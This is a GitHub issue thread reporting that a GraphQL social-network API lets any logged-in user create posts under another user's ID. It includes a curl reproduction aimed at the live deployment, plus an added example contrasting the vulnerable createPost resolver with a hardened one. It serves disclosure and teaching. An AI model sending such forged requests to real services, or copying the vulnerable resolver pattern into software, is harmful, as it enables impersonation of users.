
Security problem #65

Closed
fabiooshiro opened this issue Aug 22, 2020 · 7 comments
Labels
type: bug Something isn't working

Comments

@fabiooshiro

Hi guys, nice work!

I found a problem that allows me to post with the name of other people...

How does the security layer work in resolvers?

fabiooshiro added the "type: bug" label on Aug 22, 2020

@DimiMikadze (Owner)

Hi @fabiooshiro, thanks for opening the issue. However, please respect the issue template, so the bug you are encountering is easily understandable and replicable for other people.

You need to elaborate more on describing the bug and explaining steps to reproduce.

@fabiooshiro (Author)

Step 1: find the user ID
[image]

Step 2: replace the access token and the ID

curl 'https://csn-api.herokuapp.com/graphql' \
  -H 'Connection: keep-alive' \
  -H 'accept: */*' \
  -H 'authorization: <YOUR-ACCESS-TOKEN>' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' \
  -H 'content-type: application/json' \
  -H 'Origin: https://worldexplorer.netlify.app' \
  -H 'Sec-Fetch-Site: cross-site' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Referer: https://worldexplorer.netlify.app/' \
  -H 'Accept-Language: en-US,en;q=0.9,pt;q=0.8' \
  --data-binary $'{"operationName":null,"variables":{"input":{"title":"Some post","image":"","authorId":"<THE-USER-ID>"}},"query":"mutation ($input: CreatePostInput\u0021) {\\n  createPost(input: $input) {\\n    id\\n    __typename\\n  }\\n}\\n"}' \
  --compressed
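
The request above works because the createPost resolver stores whatever authorId the client sends instead of the identity behind the access token. As an added illustration (not code from this project), the vulnerable resolver pattern beside a hardened one that takes the author from the authenticated user in the resolver context; the users table, the "token-<userId>" token format and the authenticate() helper are constructed stand-ins.

```javascript
// Added example, not the project's own code. Resolvers are plain
// (parent, args, context) functions, so they can be exercised without a server.
const posts = [];
// Constructed user records.
const users = { u1: { id: 'u1', name: 'alice' }, u2: { id: 'u2', name: 'bob' } };

// Constructed stand-in for token verification: the token is just "token-<userId>".
function authenticate(authHeader) {
  const m = /^token-(\w+)$/.exec(authHeader || '');
  return m && users[m[1]] ? users[m[1]] : null;
}

// VULNERABLE: the caller is authenticated, but the post is stored under the
// client-supplied authorId, so any valid token can post as any user.
function createPostVulnerable(_parent, { input }, context) {
  if (!context.authUser) throw new Error('Unauthenticated');
  const post = { id: `p${posts.length + 1}`, title: input.title, authorId: input.authorId };
  posts.push(post);
  return post;
}

// HARDENED: authorId comes only from the verified identity in context. A
// client-supplied authorId that disagrees is rejected; ideally the field is
// also removed from CreatePostInput so it cannot be supplied at all.
function createPostHardened(_parent, { input }, context) {
  if (!context.authUser) throw new Error('Unauthenticated');
  if (input.authorId !== undefined && input.authorId !== context.authUser.id) {
    throw new Error('Forbidden: authorId does not match the authenticated user');
  }
  const post = { id: `p${posts.length + 1}`, title: input.title, authorId: context.authUser.id };
  posts.push(post);
  return post;
}

// Replays the shape of the reported request: bob's token with some authorId.
function runScenario(resolver, requestedAuthorId) {
  const context = { authUser: authenticate('token-u2') };
  const args = { input: { title: 'Some post', image: '', authorId: requestedAuthorId } };
  try {
    return { ok: true, authorId: resolver(null, args, context).authorId };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// Bob's token, Alice's id: the vulnerable resolver stores 'u1', the hardened one refuses.
console.log(runScenario(createPostVulnerable, 'u1'), runScenario(createPostHardened, 'u1'));
```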

@fabiooshiro (Author)

The result:
[image]

@fabiooshiro (Author)

If you dig more, you will see that all system parts suffer from the same problem...
The good news is that it's not difficult to solve.

@fabiooshiro (Author)

Take your time.

@DimiMikadze (Owner)

@fabiooshiro Once again, thank you for reporting the bug.

Currently, I'm busy with other projects, and I'm planning to address this issue soon when I'm available.

At first, we need to investigate what parts of the application contain the bug. Then create an issue with a detailed description of the bugs, an explanation of how to reproduce them, and a plan for how to fix them.

Finally, we can start working on a PR based on a plan.

If you want to take part in this process, your work will be much appreciated, but please keep the "plan" and "issue/PR" templates in mind.

@DimiMikadze (Owner)

DimiMikadze commented Oct 5, 2020

Closing in favor of #73
